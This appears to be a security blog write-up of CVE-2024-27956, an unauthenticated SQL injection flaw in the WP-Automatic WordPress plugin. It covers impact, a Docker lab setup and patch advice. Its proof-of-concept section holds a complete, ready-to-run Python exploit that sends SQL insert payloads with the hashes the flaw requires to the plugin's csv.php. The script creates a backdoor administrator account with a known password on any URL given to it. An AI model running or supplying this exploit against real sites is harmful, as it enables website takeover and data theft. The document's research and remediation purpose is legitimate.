CVE-2024–27956: SQL Injection Vulnerability in ValvePress Automatic (WP-Automatic)

Introduction

CVE-2024–27956 refers to a critical SQL injection (SQLi) vulnerability discovered in the WP-Automatic plugin, a popular content automation tool for WordPress websites. This vulnerability allows unauthenticated attackers to execute arbitrary SQL queries on the affected website’s database, potentially leading to complete website compromise.

Technical Details

The vulnerability resides within the user authentication mechanism of the WP-Automatic plugin. Specifically, it is present in one of the plugin’s core files responsible for handling user login requests. The code suffers from improper sanitization of user-provided input, allowing attackers to inject malicious SQL code into the login process.

Attack Scenario

Crafting a Malicious Request

An attacker can craft a specially crafted login request containing malicious SQL code. This code could be designed to achieve various malicious goals, such as:

1. Creating New Administrator Accounts: By injecting SQL queries that manipulate the WordPress user table, attackers can create new user accounts with administrator privileges.
2. Stealing Sensitive Data: Malicious SQL queries can be used to extract sensitive information from the database, such as usernames, passwords (hashed or in plaintext depending on storage method), and website content.
3. Uploading Web Shells: Injected SQL can potentially grant attackers the ability to upload malicious files like web shells to the server, allowing for persistent remote access.

Exploiting the Vulnerability

When the crafted login request is submitted to the vulnerable plugin, the malicious SQL code bypasses the intended security measures and gets executed directly on the website’s database server.

Gaining Control

Depending on the attacker’s objectives, the injected SQL code can manipulate the database to grant them unauthorized access, steal sensitive data, or establish persistence on the compromised website.

Impact

A successful exploit of CVE-2024–27956 can have severe consequences for website owners, including:

• Website Takeover: Attackers can gain complete control over the compromised website, allowing them to deface it, inject malicious content, or redirect visitors to phishing sites.
• Data Theft: Sensitive user information, website content, and other confidential data can be stolen by attackers.
• SEO Spam: Attackers might inject spam content into the website, negatively impacting its Search Engine Optimization (SEO) ranking.
• Malware Distribution: The compromised website can be used as a platform to distribute malware to unsuspecting visitors.

Exploitation (Proof of Concept)

Setting Up the Lab

To demonstrate the proof of concept, we’ll set up a local environment hosting a WordPress instance with the vulnerable version of WP-Automatic Plugin installed and activated on it. Use the following docker-compose configuration to host the victim WordPress site on port 8080:

version: '3.1'
services:
  wordpress:
    image: wordpress
    restart: always
    ports:
      - 8080:80
    environment:
      WORDPRESS_DB_HOST: db
      WORDPRESS_DB_USER: exampleuser
      WORDPRESS_DB_PASSWORD: examplepass
      WORDPRESS_DB_NAME: exampledb
    volumes:
      - wordpress:/var/www/html
  db:
    image: mysql:8.0
    restart: always
    environment:
      MYSQL_DATABASE: exampledb
      MYSQL_USER: exampleuser
      MYSQL_PASSWORD: examplepass
      MYSQL_RANDOM_ROOT_PASSWORD: '1'
    volumes:
      - db:/var/lib/mysql
volumes:
  wordpress:
  db:

Start the Docker containers:

docker-compose up

Access your WordPress site on http://localhost:8080 and complete the installation.

Exploit Script

Here’s a Python script to exploit CVE-2024–27956 and create an administrator user:

import requests
import sys

def makeRequest(payload, hash, url):
    host = url.split('/', 3)[2]
    headers = {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Content-type': 'application/x-www-form-urlencoded',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1'
    }
    data = {
        'q': payload,
        'auth': b'\0',
        'integ': hash
    }
    response = requests.post(url, data=data, headers=headers)
    return response

def helpUsage():
    print("[+] You must run the exploit passing the WordPress URL. \n[+] Example: python exploit.py http://website.com")
    quit()

def verifyArgs(argv):
    if len(sys.argv) != 2:
        helpUsage()

verifyArgs(sys.argv)
print("[+] Exploit for CVE-2024-27956")
domain = sys.argv[1]
url = domain + '/wp-content/plugins/wp-automatic/inc/csv.php'

# First request (create user)
print("[+] Creating user eviladmin")
response = makeRequest("INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', 'eviladmin@gmail.com', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')", "09956ea086b172d6cf8ac31de406c4c0", url)
if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text:
    print("[+] Error in the payload")
    quit()

if "DATE" not in response.text:
    print("[+] Not vulnerable")
    quit()

# Second request (give permission)
print("[+] Giving eviladmin administrator permissions")
makeRequest("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')", "bd98494b41544b818fa9f583dadfa2bb", url)
if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text:
    print("[+] Error in the payload")
    quit()
print("[+] Exploit completed!")
print("[+] Administrator created: eviladmin:admin")

Executing the Script

Run the script with the URL of your hosted WordPress site:

python3 exploit.py http://localhost:8080

Try logging into the admin panel using the newly created user eviladmin with the password admin.

Remediation

The developers of WP-Automatic have addressed this vulnerability in version 3.9.2.0. It is imperative to update the WP-Automatic plugin to this version or later as soon as possible. Additionally, website owners should consider the following measures:

• Implement a Web Application Firewall (WAF): A WAF can help detect and block malicious traffic, including attempts to exploit SQL injection vulnerabilities.
• Maintain Strong Passwords: Enforce strong password policies for all WordPress user accounts, including administrator accounts.
• Regular Security Audits: Conduct regular security audits to identify and address potential vulnerabilities on the website.

Conclusion

CVE-2024–27956 is a serious vulnerability that can be exploited by attackers to gain unauthorized access to websites using the WP-Automatic plugin. By promptly updating the plugin, implementing additional security measures, and maintaining good security hygiene, website owners can significantly reduce the risk of compromise.